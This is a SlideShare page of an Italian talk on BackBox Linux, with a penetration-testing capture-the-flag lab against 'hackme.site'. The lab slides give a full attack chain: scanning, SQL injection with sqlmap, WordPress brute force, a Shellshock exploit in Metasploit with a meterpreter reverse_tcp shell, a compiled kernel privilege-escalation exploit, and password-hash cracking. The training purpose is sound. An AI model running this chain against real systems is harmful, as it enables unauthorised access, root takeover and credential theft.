SlideShare ist ein Scribd-Unternehmen logo
1 von 17
Downloaden Sie, um offline zu lesen
BackBox Linux
Penetration Test and Security Assessment
RaspiBO - 23 Febbraio 2016
Simulazione di un Penetration Test
Andrea Draghetti
About Me
BackBox Team Member
Over Security Founder
Independent Security Researcher
….
About BackBox
BackBox è una distribuzione Free Open Source nata nel 2010 in
Italia ed è concepita per gli appassionati di Sicurezza Informatica!
Permette di effettuare Penetration Testing e Security Assessment.
È basata su Ubuntu, offre oltre 100 Tools dedicati al mondo dell’IT
Security, Mobile Analysis, ecc. 



Ha un piano di rilascio previsto ogni 4 mesi e compatibile con
ecosistemi a 32 o 64Bit.
Look At The World
DistroWatch attesta
a BackBox la seconda
posizione della sua
categoria. È la 56° distro
Linux più scaricata
al mondo.
BackBox 4.5
ha ottenuto oltre
40mila download dal
26 Gennaio 2016
Linux User & Developer - Feb 2016
Screenshot
Follow BackBox
backbox.org
launchpad.net/~backbox
facebook.com/backbox.linux
twitter.com/backboxlinux
Penetration Test
Il penetration test è un processo di valutazione della
sicurezza di un sistema o di una rete che simula
l’attacco di un utente malintenzionato. L’analisi viene
condotta sfruttando l’intelletto umano e software
dedicati, ed ha come obiettivo quello di evidenziare le
debolezze del sistema fornendo il maggior numero di
informazioni sulle vulnerabilità che hanno permesso
l’accesso non autorizzato.
Simulazione di un Penetration Test
I. Information Gathering
II. Vulnerability Assessment
III. Exploitation
IV. Privilege Escalation
V. Maintaining Access
VI. Reporting.
Documento completo sulla simulazione di un Penetration Test
http://www.isticom.it/documenti/rivista/rivista2013/2013_12_129-134_simulazione_penetration_test.pdf
Standard, in fase di definizione, degli elementi fondamentali di un PenTest
http://www.pentest-standard.org
Lab: Capture the Flag
Capture the Flag, letteralmente “cattura la bandiera”, è una
modalità di simulazione del Penetration Testing per allenarsi e
migliorare le proprie abilità.
vulnhub.com contiene un importante archivio di macchine
virtuali preparate per effettuare penetration testing in locale.
ctftime.org raggruppa i principali eventi di CTF mondiali e i
punteggi dei partecipanti.
seeweb.it annualmente organizza una sfida di Hacking con
importanti premi in palio.
Lab
BackBox Linux
Target: hackme.site
Flag: /root/flag.txt
Lab: Information Gathering
BackBox Linux
• Porte
• 22 SSH
• 80 Apache
• Web
• /phpmyadmin
• /wp
• /panel
• /info
• /cgi-bin
• dirs3arch -u http://hackme.site -e php
• nmap -A -v hackme.site
• nmap -sn 192.168.x.1-254
Target: hackme.site
Lab: Vulnerability Assessment
BackBox Linux
• Porte
• 22 SSH
• 80 Apache
• Web
• /phpmyadmin
• /wp
• /panel
• /info
• /cgi-bin
• Panel
• SQL Injection
Target: hackme.site
• sqlmap -u http://hackme.site/panel --form
• dirs3arch -u http://hackme.site -e php
• nmap -A -v hackme.site
• nmap -sn 192.168.x.1-254
Lab: Vulnerability Assessment
BackBox Linux
Target: hackme.site
• Porte
• 22 SSH
• 80 Apache
• Web
• /phpmyadmin
• /wp
• /panel
• /info
• /cgi-bin
• Panel
• SQL Injection
• Wordpress
• XSS Vulnerability
• No Brute force protection
• wpscan -u http://hackme.site/wp
--wordlist psw.txt --username admin
• wpscan -u http://hackme.site/wp -e u
• wpscan -u http://hackme.site/wp -e p
• sqlmap -u http://hackme.site/panel --form
• dirs3arch -u http://hackme.site -e php
• nmap -A -v hackme.site
• nmap -sn 192.168.x.1-254
Lab: Exploitation
BackBox Linux
Target: hackme.site
• Porte
• 22 SSH
• 80 Apache
• Web
• /phpmyadmin
• /wp
• /panel
• /info
• /cgi-bin
• Panel
• SQL Injection
• Wordpress
• XSS Vulnerability
• No Brute force protection
• CGI
• Shellshock Vulnerability
• shell and more…
• exploit
• set options …
• set PAYLOAD linux/x86/meterpreter/
reverse_tcp
• use exploit/multi/http/
apache_mod_cgi_bash_env_exec
• msfconsole
• wpscan -u http://hackme.site/wp
--wordlist psw.txt --username admin
• wpscan -u http://hackme.site/wp -e u
• wpscan -u http://hackme.site/wp -e p
• sqlmap -u http://hackme.site/panel --form
• dirs3arch -u http://hackme.site -e php
• nmap -A -v hackme.site
• nmap -sn 192.168.x.1-254
Lab: Privilege Escalation
BackBox Linux
Target: hackme.site
• Porte
• 22 SSH
• 80 Apache
• Web
• /phpmyadmin
• /wp
• /panel
• /info
• /cgi-bin
• Panel
• SQL Injection
• Wordpress
• XSS Vulnerability
• No Brute force protection
• CGI
• Shellshock Vulnerability
• Shell
• Kernel Privilege Escalation
• extra: john pass
• extra: unshadow passwd shadow > pass
• cat /root/flag.txt
• ./exploit
• gcc 18411.c -o exploit
• shell and more…
• exploit
• set options …
• set PAYLOAD linux/x86/meterpreter/
reverse_tcp
• use exploit/multi/http/
apache_mod_cgi_bash_env_exec
• msfconsole
• wpscan -u http://hackme.site/wp
--wordlist psw.txt --username admin
• wpscan -u http://hackme.site/wp -e u
• wpscan -u http://hackme.site/wp -e p
• sqlmap -u http://hackme.site/panel --form
• dirs3arch -u http://hackme.site -e php
• nmap -A -v hackme.site
• nmap -sn 192.168.x.1-254
Lab
BackBox Linux
Target: hackme.site
Happy Hacking!
Questions?
andrea@backbox.org

Weitere ähnliche Inhalte

Was ist angesagt?

La complessità del malware: analisi strutturale ed ambienti di sviluppo
La complessità del malware: analisi strutturale ed ambienti di sviluppoLa complessità del malware: analisi strutturale ed ambienti di sviluppo
La complessità del malware: analisi strutturale ed ambienti di sviluppo
Marco Ferrigno
 
Cyber Forensics - Acquisizione e analisi dei dati
Cyber Forensics - Acquisizione e analisi dei datiCyber Forensics - Acquisizione e analisi dei dati
Cyber Forensics - Acquisizione e analisi dei dati
Marco Ferrigno
 
Digital Forensics: metodologie analisi multipiattaforma
Digital Forensics: metodologie analisi multipiattaformaDigital Forensics: metodologie analisi multipiattaforma
Digital Forensics: metodologie analisi multipiattaforma
Marco Ferrigno
 
Understanding Linux: 20 anni di kernel tra storia e tecnica
Understanding Linux: 20 anni di kernel tra storia e tecnicaUnderstanding Linux: 20 anni di kernel tra storia e tecnica
Understanding Linux: 20 anni di kernel tra storia e tecnica
Marco Ferrigno
 
festival ICT 2013: Alla ricerca della pendrive perduta
festival ICT 2013: Alla ricerca della pendrive perdutafestival ICT 2013: Alla ricerca della pendrive perduta
festival ICT 2013: Alla ricerca della pendrive perduta
festival ICT 2016
 
PIT2012: Workshop@UniNA - Compilazione del Kernel Linux
PIT2012: Workshop@UniNA - Compilazione del Kernel LinuxPIT2012: Workshop@UniNA - Compilazione del Kernel Linux
PIT2012: Workshop@UniNA - Compilazione del Kernel Linux
Marco Ferrigno
 
Agrillo Fedora 11 release party 18 giugno 2009
Agrillo Fedora 11 release party 18 giugno 2009Agrillo Fedora 11 release party 18 giugno 2009
Agrillo Fedora 11 release party 18 giugno 2009
Giuseppe Agrillo
 
Security and hacking engineering - metodologie di attacco e difesa con strume...
Security and hacking engineering - metodologie di attacco e difesa con strume...Security and hacking engineering - metodologie di attacco e difesa con strume...
Security and hacking engineering - metodologie di attacco e difesa con strume...
Marco Ferrigno
 

Was ist angesagt? (20)

Introduzione all'Information Gathering
Introduzione all'Information GatheringIntroduzione all'Information Gathering
Introduzione all'Information Gathering
 
Coding for Hackers - Linux Day 2016
Coding for Hackers - Linux Day 2016Coding for Hackers - Linux Day 2016
Coding for Hackers - Linux Day 2016
 
Attacchi e difese
Attacchi e difeseAttacchi e difese
Attacchi e difese
 
La complessità del malware: analisi strutturale ed ambienti di sviluppo
La complessità del malware: analisi strutturale ed ambienti di sviluppoLa complessità del malware: analisi strutturale ed ambienti di sviluppo
La complessità del malware: analisi strutturale ed ambienti di sviluppo
 
Linux Security Hardening - panoramica sui principi generali per la riduzione...
Linux  Security Hardening - panoramica sui principi generali per la riduzione...Linux  Security Hardening - panoramica sui principi generali per la riduzione...
Linux Security Hardening - panoramica sui principi generali per la riduzione...
 
Cyber Forensics - Acquisizione e analisi dei dati
Cyber Forensics - Acquisizione e analisi dei datiCyber Forensics - Acquisizione e analisi dei dati
Cyber Forensics - Acquisizione e analisi dei dati
 
Errori informatici da non commettere nel mondo lavorativo
Errori informatici da non commettere nel mondo lavorativoErrori informatici da non commettere nel mondo lavorativo
Errori informatici da non commettere nel mondo lavorativo
 
Il tuo router è sicuro?!
Il tuo router è sicuro?!Il tuo router è sicuro?!
Il tuo router è sicuro?!
 
Linux Day 2014 - Napoli - Programma Il Futuro: una scelta open source
Linux Day 2014 - Napoli - Programma Il Futuro: una scelta open sourceLinux Day 2014 - Napoli - Programma Il Futuro: una scelta open source
Linux Day 2014 - Napoli - Programma Il Futuro: una scelta open source
 
Malware
MalwareMalware
Malware
 
Digital Forensics: metodologie analisi multipiattaforma
Digital Forensics: metodologie analisi multipiattaformaDigital Forensics: metodologie analisi multipiattaforma
Digital Forensics: metodologie analisi multipiattaforma
 
Backdoor Coding: Analisi di una semplice backdoor e prime applicazioni
Backdoor Coding: Analisi di una semplice backdoor e prime applicazioniBackdoor Coding: Analisi di una semplice backdoor e prime applicazioni
Backdoor Coding: Analisi di una semplice backdoor e prime applicazioni
 
Scacco matto ai crytpo malware (milano)
Scacco matto ai crytpo malware (milano)Scacco matto ai crytpo malware (milano)
Scacco matto ai crytpo malware (milano)
 
Owasp Day 3
Owasp Day 3Owasp Day 3
Owasp Day 3
 
Understanding Linux: 20 anni di kernel tra storia e tecnica
Understanding Linux: 20 anni di kernel tra storia e tecnicaUnderstanding Linux: 20 anni di kernel tra storia e tecnica
Understanding Linux: 20 anni di kernel tra storia e tecnica
 
festival ICT 2013: Alla ricerca della pendrive perduta
festival ICT 2013: Alla ricerca della pendrive perdutafestival ICT 2013: Alla ricerca della pendrive perduta
festival ICT 2013: Alla ricerca della pendrive perduta
 
PIT2012: Workshop@UniNA - Compilazione del Kernel Linux
PIT2012: Workshop@UniNA - Compilazione del Kernel LinuxPIT2012: Workshop@UniNA - Compilazione del Kernel Linux
PIT2012: Workshop@UniNA - Compilazione del Kernel Linux
 
Cenni su SSL/TLS Heartbleed
Cenni su SSL/TLS HeartbleedCenni su SSL/TLS Heartbleed
Cenni su SSL/TLS Heartbleed
 
Agrillo Fedora 11 release party 18 giugno 2009
Agrillo Fedora 11 release party 18 giugno 2009Agrillo Fedora 11 release party 18 giugno 2009
Agrillo Fedora 11 release party 18 giugno 2009
 
Security and hacking engineering - metodologie di attacco e difesa con strume...
Security and hacking engineering - metodologie di attacco e difesa con strume...Security and hacking engineering - metodologie di attacco e difesa con strume...
Security and hacking engineering - metodologie di attacco e difesa con strume...
 

Andere mochten auch

App Penetration Test
App Penetration TestApp Penetration Test
App Penetration Test
Aung Khant
 
festival ICT 2013: Tra imbarazzi e perdite economiche: un anno di violazioni ...
festival ICT 2013: Tra imbarazzi e perdite economiche: un anno di violazioni ...festival ICT 2013: Tra imbarazzi e perdite economiche: un anno di violazioni ...
festival ICT 2013: Tra imbarazzi e perdite economiche: un anno di violazioni ...
festival ICT 2016
 
TriplePlay-WebAppPenTestingTools
TriplePlay-WebAppPenTestingToolsTriplePlay-WebAppPenTestingTools
TriplePlay-WebAppPenTestingTools
Yury Chemerkin
 
festival ICT 2013: ICT 4 Development: informatica e Terzo Settore per l’innov...
festival ICT 2013: ICT 4 Development: informatica e Terzo Settore per l’innov...festival ICT 2013: ICT 4 Development: informatica e Terzo Settore per l’innov...
festival ICT 2013: ICT 4 Development: informatica e Terzo Settore per l’innov...
festival ICT 2016
 

Andere mochten auch (16)

Phishing - Analisi, Simulazione e Contromisure
Phishing - Analisi, Simulazione e ContromisurePhishing - Analisi, Simulazione e Contromisure
Phishing - Analisi, Simulazione e Contromisure
 
Web Application Penetration Tests - Information Gathering Stage
Web Application Penetration Tests - Information Gathering StageWeb Application Penetration Tests - Information Gathering Stage
Web Application Penetration Tests - Information Gathering Stage
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration Testing
 
App Penetration Test
App Penetration TestApp Penetration Test
App Penetration Test
 
festival ICT 2013: Tra imbarazzi e perdite economiche: un anno di violazioni ...
festival ICT 2013: Tra imbarazzi e perdite economiche: un anno di violazioni ...festival ICT 2013: Tra imbarazzi e perdite economiche: un anno di violazioni ...
festival ICT 2013: Tra imbarazzi e perdite economiche: un anno di violazioni ...
 
Offensive security con strumenti open source
Offensive security con strumenti open sourceOffensive security con strumenti open source
Offensive security con strumenti open source
 
TriplePlay-WebAppPenTestingTools
TriplePlay-WebAppPenTestingToolsTriplePlay-WebAppPenTestingTools
TriplePlay-WebAppPenTestingTools
 
festival ICT 2013: ICT 4 Development: informatica e Terzo Settore per l’innov...
festival ICT 2013: ICT 4 Development: informatica e Terzo Settore per l’innov...festival ICT 2013: ICT 4 Development: informatica e Terzo Settore per l’innov...
festival ICT 2013: ICT 4 Development: informatica e Terzo Settore per l’innov...
 
Nikto
NiktoNikto
Nikto
 
Hack me now, hack me then @ btp
Hack me now, hack me then @ btpHack me now, hack me then @ btp
Hack me now, hack me then @ btp
 
Let’s play the game. Yet another way to perform penetration test. Russian “re...
Let’s play the game. Yet another way to perform penetration test. Russian “re...Let’s play the game. Yet another way to perform penetration test. Russian “re...
Let’s play the game. Yet another way to perform penetration test. Russian “re...
 
Nikto
NiktoNikto
Nikto
 
OpenVAS, lo strumento open source per il vulnerability assessment
OpenVAS, lo strumento open source per il vulnerability assessmentOpenVAS, lo strumento open source per il vulnerability assessment
OpenVAS, lo strumento open source per il vulnerability assessment
 
Web Application Security 101 - 04 Testing Methodology
Web Application Security 101 - 04 Testing MethodologyWeb Application Security 101 - 04 Testing Methodology
Web Application Security 101 - 04 Testing Methodology
 
Web Application Security 101 - 03 Web Security Toolkit
Web Application Security 101 - 03 Web Security ToolkitWeb Application Security 101 - 03 Web Security Toolkit
Web Application Security 101 - 03 Web Security Toolkit
 
we45 - Web Application Security Testing Case Study
we45 - Web Application Security Testing Case Studywe45 - Web Application Security Testing Case Study
we45 - Web Application Security Testing Case Study
 

Ähnlich wie BackBox Linux: Simulazione di un Penetration Test e CTF

Italian deft 7 manual 90
Italian deft 7 manual 90Italian deft 7 manual 90
Italian deft 7 manual 90
mstrom62
 

Ähnlich wie BackBox Linux: Simulazione di un Penetration Test e CTF (20)

Programma il futuro: una scelta open source
Programma il futuro: una scelta open sourceProgramma il futuro: una scelta open source
Programma il futuro: una scelta open source
 
Automotive Security
Automotive SecurityAutomotive Security
Automotive Security
 
Programma il futuro : una scelta Open Source
Programma il futuro : una scelta Open SourceProgramma il futuro : una scelta Open Source
Programma il futuro : una scelta Open Source
 
CMS - Analisi Vulnerabilità
CMS - Analisi VulnerabilitàCMS - Analisi Vulnerabilità
CMS - Analisi Vulnerabilità
 
Web Content Filtering
Web Content FilteringWeb Content Filtering
Web Content Filtering
 
Tutto Quello Che Devi Sapere Su Cryptolocker.pdf
Tutto Quello Che Devi Sapere Su Cryptolocker.pdfTutto Quello Che Devi Sapere Su Cryptolocker.pdf
Tutto Quello Che Devi Sapere Su Cryptolocker.pdf
 
Hardening
HardeningHardening
Hardening
 
Liferay - Quick Start 1° Episodio
Liferay - Quick Start 1° EpisodioLiferay - Quick Start 1° Episodio
Liferay - Quick Start 1° Episodio
 
Italian deft 7 manual 90
Italian deft 7 manual 90Italian deft 7 manual 90
Italian deft 7 manual 90
 
Linux per la Computer Forensics: i motivi di una scelta
Linux per la Computer Forensics: i motivi di una sceltaLinux per la Computer Forensics: i motivi di una scelta
Linux per la Computer Forensics: i motivi di una scelta
 
Sfdumper e cugini
Sfdumper e cuginiSfdumper e cugini
Sfdumper e cugini
 
Cuckoo Sandbox: Automated malware analysis
Cuckoo Sandbox: Automated malware analysisCuckoo Sandbox: Automated malware analysis
Cuckoo Sandbox: Automated malware analysis
 
TuxIsAlive
TuxIsAliveTuxIsAlive
TuxIsAlive
 
Sistemi di Virtualizzazione con Gnu/Linux Xen vs VMware
Sistemi di Virtualizzazione con Gnu/Linux Xen vs VMwareSistemi di Virtualizzazione con Gnu/Linux Xen vs VMware
Sistemi di Virtualizzazione con Gnu/Linux Xen vs VMware
 
Rootkit: teoria e pratica. Michele BOLOGNA
Rootkit: teoria e pratica. Michele BOLOGNARootkit: teoria e pratica. Michele BOLOGNA
Rootkit: teoria e pratica. Michele BOLOGNA
 
Tanti "piccoli rilasci" con Symfony2
Tanti "piccoli rilasci" con Symfony2Tanti "piccoli rilasci" con Symfony2
Tanti "piccoli rilasci" con Symfony2
 
TYPO3 CMS 6.2 LTS - Le Novità
TYPO3 CMS 6.2 LTS - Le NovitàTYPO3 CMS 6.2 LTS - Le Novità
TYPO3 CMS 6.2 LTS - Le Novità
 
Aumentiamo la sicurezza in TYPO3
Aumentiamo la sicurezza in TYPO3Aumentiamo la sicurezza in TYPO3
Aumentiamo la sicurezza in TYPO3
 
Linux Embedded per l'automazione
Linux Embedded per l'automazioneLinux Embedded per l'automazione
Linux Embedded per l'automazione
 
Intrusion Detection Systems
Intrusion Detection SystemsIntrusion Detection Systems
Intrusion Detection Systems
 

Mehr von Andrea Draghetti

Mehr von Andrea Draghetti (11)

Frodi online: Analisi, simulazione e contromisure
Frodi online: Analisi, simulazione e contromisureFrodi online: Analisi, simulazione e contromisure
Frodi online: Analisi, simulazione e contromisure
 
Phishing: tecniche e strategie di un fenomeno in evoluzione
Phishing: tecniche e strategie di un fenomeno in evoluzionePhishing: tecniche e strategie di un fenomeno in evoluzione
Phishing: tecniche e strategie di un fenomeno in evoluzione
 
Gophish: Simuliamo una campagna di phishing
Gophish: Simuliamo una campagna di phishingGophish: Simuliamo una campagna di phishing
Gophish: Simuliamo una campagna di phishing
 
Linux Day Orvieto: Analisi di una email, identifichiamo una minaccia!
Linux Day Orvieto: Analisi di una email, identifichiamo una minaccia!Linux Day Orvieto: Analisi di una email, identifichiamo una minaccia!
Linux Day Orvieto: Analisi di una email, identifichiamo una minaccia!
 
Let’s spread Phishing and escape the blocklists
Let’s spread Phishing and escape the blocklistsLet’s spread Phishing and escape the blocklists
Let’s spread Phishing and escape the blocklists
 
Cyber War: L’antivirus è un illusione
Cyber War: L’antivirus è un illusioneCyber War: L’antivirus è un illusione
Cyber War: L’antivirus è un illusione
 
NFC: Tecnologia e Sicurezza
NFC: Tecnologia e SicurezzaNFC: Tecnologia e Sicurezza
NFC: Tecnologia e Sicurezza
 
Pi-Hole limitiamo la tracciabilità degli annunci pubblicitari
Pi-Hole limitiamo la tracciabilità degli annunci pubblicitariPi-Hole limitiamo la tracciabilità degli annunci pubblicitari
Pi-Hole limitiamo la tracciabilità degli annunci pubblicitari
 
Hacking Lab con ProxMox e Metasploitable
Hacking Lab con ProxMox e MetasploitableHacking Lab con ProxMox e Metasploitable
Hacking Lab con ProxMox e Metasploitable
 
Phishing: One Shot Many Victims
Phishing: One Shot Many VictimsPhishing: One Shot Many Victims
Phishing: One Shot Many Victims
 
[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...
[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...
[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...
 

BackBox Linux: Simulazione di un Penetration Test e CTF

  • 1. BackBox Linux Penetration Test and Security Assessment RaspiBO - 23 Febbraio 2016 Simulazione di un Penetration Test Andrea Draghetti
  • 2. About Me BackBox Team Member Over Security Founder Independent Security Researcher ….
  • 3. About BackBox BackBox è una distribuzione Free Open Source nata nel 2010 in Italia ed è concepita per gli appassionati di Sicurezza Informatica! Permette di effettuare Penetration Testing e Security Assessment. È basata su Ubuntu, offre oltre 100 Tools dedicati al mondo dell’IT Security, Mobile Analysis, ecc. 
 
 Ha un piano di rilascio previsto ogni 4 mesi e compatibile con ecosistemi a 32 o 64Bit.
  • 4. Look At The World DistroWatch attesta a BackBox la seconda posizione della sua categoria. È la 56° distro Linux più scaricata al mondo. BackBox 4.5 ha ottenuto oltre 40mila download dal 26 Gennaio 2016 Linux User & Developer - Feb 2016
  • 7. Penetration Test Il penetration test è un processo di valutazione della sicurezza di un sistema o di una rete che simula l’attacco di un utente malintenzionato. L’analisi viene condotta sfruttando l’intelletto umano e software dedicati, ed ha come obiettivo quello di evidenziare le debolezze del sistema fornendo il maggior numero di informazioni sulle vulnerabilità che hanno permesso l’accesso non autorizzato.
  • 8. Simulazione di un Penetration Test I. Information Gathering II. Vulnerability Assessment III. Exploitation IV. Privilege Escalation V. Maintaining Access VI. Reporting. Documento completo sulla simulazione di un Penetration Test http://www.isticom.it/documenti/rivista/rivista2013/2013_12_129-134_simulazione_penetration_test.pdf Standard, in fase di definizione, degli elementi fondamentali di un PenTest http://www.pentest-standard.org
  • 9. Lab: Capture the Flag Capture the Flag, letteralmente “cattura la bandiera”, è una modalità di simulazione del Penetration Testing per allenarsi e migliorare le proprie abilità. vulnhub.com contiene un importante archivio di macchine virtuali preparate per effettuare penetration testing in locale. ctftime.org raggruppa i principali eventi di CTF mondiali e i punteggi dei partecipanti. seeweb.it annualmente organizza una sfida di Hacking con importanti premi in palio.
  • 11. Lab: Information Gathering BackBox Linux • Porte • 22 SSH • 80 Apache • Web • /phpmyadmin • /wp • /panel • /info • /cgi-bin • dirs3arch -u http://hackme.site -e php • nmap -A -v hackme.site • nmap -sn 192.168.x.1-254 Target: hackme.site
  • 12. Lab: Vulnerability Assessment BackBox Linux • Porte • 22 SSH • 80 Apache • Web • /phpmyadmin • /wp • /panel • /info • /cgi-bin • Panel • SQL Injection Target: hackme.site • sqlmap -u http://hackme.site/panel --form • dirs3arch -u http://hackme.site -e php • nmap -A -v hackme.site • nmap -sn 192.168.x.1-254
  • 13. Lab: Vulnerability Assessment BackBox Linux Target: hackme.site • Porte • 22 SSH • 80 Apache • Web • /phpmyadmin • /wp • /panel • /info • /cgi-bin • Panel • SQL Injection • Wordpress • XSS Vulnerability • No Brute force protection • wpscan -u http://hackme.site/wp --wordlist psw.txt --username admin • wpscan -u http://hackme.site/wp -e u • wpscan -u http://hackme.site/wp -e p • sqlmap -u http://hackme.site/panel --form • dirs3arch -u http://hackme.site -e php • nmap -A -v hackme.site • nmap -sn 192.168.x.1-254
  • 14. Lab: Exploitation BackBox Linux Target: hackme.site • Porte • 22 SSH • 80 Apache • Web • /phpmyadmin • /wp • /panel • /info • /cgi-bin • Panel • SQL Injection • Wordpress • XSS Vulnerability • No Brute force protection • CGI • Shellshock Vulnerability • shell and more… • exploit • set options … • set PAYLOAD linux/x86/meterpreter/ reverse_tcp • use exploit/multi/http/ apache_mod_cgi_bash_env_exec • msfconsole • wpscan -u http://hackme.site/wp --wordlist psw.txt --username admin • wpscan -u http://hackme.site/wp -e u • wpscan -u http://hackme.site/wp -e p • sqlmap -u http://hackme.site/panel --form • dirs3arch -u http://hackme.site -e php • nmap -A -v hackme.site • nmap -sn 192.168.x.1-254
  • 15. Lab: Privilege Escalation BackBox Linux Target: hackme.site • Porte • 22 SSH • 80 Apache • Web • /phpmyadmin • /wp • /panel • /info • /cgi-bin • Panel • SQL Injection • Wordpress • XSS Vulnerability • No Brute force protection • CGI • Shellshock Vulnerability • Shell • Kernel Privilege Escalation • extra: john pass • extra: unshadow passwd shadow > pass • cat /root/flag.txt • ./exploit • gcc 18411.c -o exploit • shell and more… • exploit • set options … • set PAYLOAD linux/x86/meterpreter/ reverse_tcp • use exploit/multi/http/ apache_mod_cgi_bash_env_exec • msfconsole • wpscan -u http://hackme.site/wp --wordlist psw.txt --username admin • wpscan -u http://hackme.site/wp -e u • wpscan -u http://hackme.site/wp -e p • sqlmap -u http://hackme.site/panel --form • dirs3arch -u http://hackme.site -e php • nmap -A -v hackme.site • nmap -sn 192.168.x.1-254